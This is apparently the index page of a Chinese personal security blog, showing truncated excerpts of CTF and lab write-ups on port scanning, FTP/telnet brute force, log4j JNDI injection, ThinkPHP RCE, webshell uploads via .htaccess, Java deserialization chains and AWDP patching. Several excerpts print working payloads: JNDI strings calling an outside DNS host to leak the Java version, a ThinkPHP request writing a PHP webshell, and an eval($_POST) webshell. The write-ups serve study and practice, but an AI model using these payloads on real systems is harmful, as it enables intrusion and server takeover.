L的博客

ps 我个人是在美国的服务器上架设代理，在vps上连接openvpn，然后使用proxifier来转发流量，liunx就用proxychains4，这样虽然比较快，但是端口扫描就只能在服务器上做了常用nmap全端口扫描1nmap -sS -sV 10.129.88.187 -p- -T5 -vv 拿到shell拿到shell后先尝试提权看用户文件而后查看后台进程 ps -aux传fscan扫其他主机的服务 Meow nmap扫太慢了，拿fscan扫可以发现开启了23端口telnet服务，尝试登陆 1telnet 10.129.150.178 直接root登陆，未授权。 正常可以用msf来爆破 kali自带自带子在1/usr/share/wordlists/legion/ Fawn FTP存在匿名登陆 匿名账号anonymous 使用msf的ftp login 模块设置好字典，账号密码用空格分隔+1set USERPASS_FILE /usr/share/wordlists/legion/ftp-betterdefaultpasslist.txt 爆破出来后可以用 ...

[HZNUCTF 2023 final]ezjava 打开靶机其告诉我们会将uri的值计入log,且fastjson的版本为1.2.48首先这个版本的fastjson是不存在我们所俗知的fastjson反序列化漏洞的,其只存在原生反序列化漏洞,而题目说会将内容计入log,着让人想到了log4j的漏洞从jndi注入到log4j注入先尝试以下payload1${jndi:dns://v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com} 可以发现成功进行了dns请求者就证明了此处存在JNDI注入我们再探测以下java版本1${jndi:dns://${sys:java.version}.v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com} 可以发现其版本为1.8.0.222这个版本的java是无法直接通过ldap来进行命令执行的而题目说其fastjson的版本为1.2.48.那么我们就可以使用ldap来触发fastjson原生反序列化从而命令 ...

今天不知道学点什么就氪金打了一下春秋云镜的靶场。只能说我对域的了解几乎为0。这篇文章记录一下域渗透的一些知识，和tp——cve的漏洞成因吧thinkphp5.23rce漏洞再路由随便传参数?s=asdwdwa就会发生报错，通过报错可以发现该think版本为5.23其漏洞payload如下123GET /?s=captcha_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pO3BocGluZm8oKTs/Pg==' |base64 -d > shell.php我们直接写马通过哥斯拉来连接 其权限为www-data。我们先进行常规提权。先尝试suid提权并没有发现可以利用的命令再尝试进行sudo提权可以发现我们能够无密码使用mysql我这里贴一个sudo提权的文章Linux提权之Sudo 70种提权方法（上）Linux提权之Sudo 70种提权方法（中）Linux提权之Sudo 7 ...

蚁剑流量1.木马的连接密码是多少密码为1 2.黑客执行的第一个命令是什么将传参的代码整理一下123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166@ini_set("display_errors", "0");@set_time_l ...

仿射密码12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152from math import gcddef text_to_numbers(text): return [ord(char) - ord('a') for char in text.lower() if char.isalpha()]def encryption(m, a, b): if gcd(a, 26) != 1: return "密钥a必须与26互质！" numbers = text_to_numbers(m) encrypted_number = [(a * num + b) % 26 for num in numbers] encrypted_text = ''.join(chr(num + ord('a')) for num in encrypted_ ...

AWDP什么是awdp？AWDP是一种综合考核参赛团队攻击、防御技术能力、即时策略的攻防兼备比赛模式。每个参赛队互为攻击方和防守方，充分体现比赛的实战性、实时性和对抗性，对参赛队的渗透能力和防护能力进行综合全面的考量。 说白了awdp其实就是ctf+漏洞修复罢了。 修复其实就是加waf，预处理，让主办方的payload无法打通修复后的web系统 正常修会比打简单，而且因为awdp是按轮数吃分的，修的越早能吃的分越多，所以一般都先修后打。 常见FIX手段SQL注入:加waf，过滤引号等，php就使用预处理，java若为mybatis就将${}改为#{} rce :找到rce的点对命令执行的函数人eval，system引号反引号等进行过滤，也可以尝试对这个rce的点进行删除 php反序列化:找到链尾对其进行过滤，在反序列化前进行过滤。在链首部如__wakeup来判断其每个属性是否为类的实例，如果是就exit() ssrf:一般ssrf都是有伴随着一个强制本地ip的命令执行路由或者文件读取路由，或者就是使用file://这种协议来文件读取，所以在写wa ...

java.util.PriorityQueue在学CB链之前我们需要回忆一下java.util.PriorityQueue，这个类是我们CC2的入口点。我们回忆一下CC2的链子1java.util.PriorityQueue#readObject->heapify->siftDown->siftDownUsingComparator->TransformingComparator#compare->xxx#transform在CC2中我们就已经知道了PriorityQueue可以调用到xxx.compare而在CB1中也是利用了这个来寻找compare类 commons.beanutilscommons beanutils这个类主要提供了对javabean进行操作的方法，如下其可以通过使用PropertyUtils.getProperty或者PropertyUtils.setProperty，BeanUtils.populate等去使用javabean的get或者set类。如下代码12345678910111213141516171819202122232 ...

序列化反序列化123456789101112131415161718192021222324public static void Serializ(Object obj) throws Exception{ ByteArrayOutputStream bos=new ByteArrayOutputStream(); FileOutputStream fos = new FileOutputStream("ser.bin"); ObjectOutputStream oos=new ObjectOutputStream(bos); oos.writeObject(obj); byte[] byteArray = bos.toByteArray(); Base64.Encoder encoder = Base64.getEncoder(); String base64 = encoder.encodeToString(byteArray); Syste ...

上传解法挺多的，一开始是发现.htaccess没有被禁止，而且<?被禁了。于是想到了尝试使用.htaccess和无<?马来getshell 12345//a.png<script language="php">eval ($_POST[hihack]);</script>//.htaccessAddType application/x-httpd-php .png 结果发现不行，直接通过.htaccess来使用php解释器来执行png文件，运行<script language="php">eval ($_POST[hihack]);</script>语法好像出现了问题与 .htaccess 相关的奇淫技巧发现可以使用.htaccess来文件包含和使用伪协议来命令执行，但是这个需要有php文件，且尝试发现无法目录穿越问题不大，简单将两个拼在一起即可file被禁可以使用\加换行符来过滤 文件读取123AddType application/x-httpd-php .pngphp_value ...

简单刷一刷java-sec-code，加强一下各种漏洞在java中的表现sql注入jdbcjdbc其实就是java原生的用于sql查询的类。 攻击12345678910111213141516171819202122232425262728293031323334353637@RequestMapping("/jdbc/vuln")public String jdbc_sqli_vul(@RequestParam("username") String username) { StringBuilder result = new StringBuilder(); try { Class.forName(driver); Connection con = DriverManager.getConnection(url, user, password); if (!con.isClosed()) System.out.println("Connec ...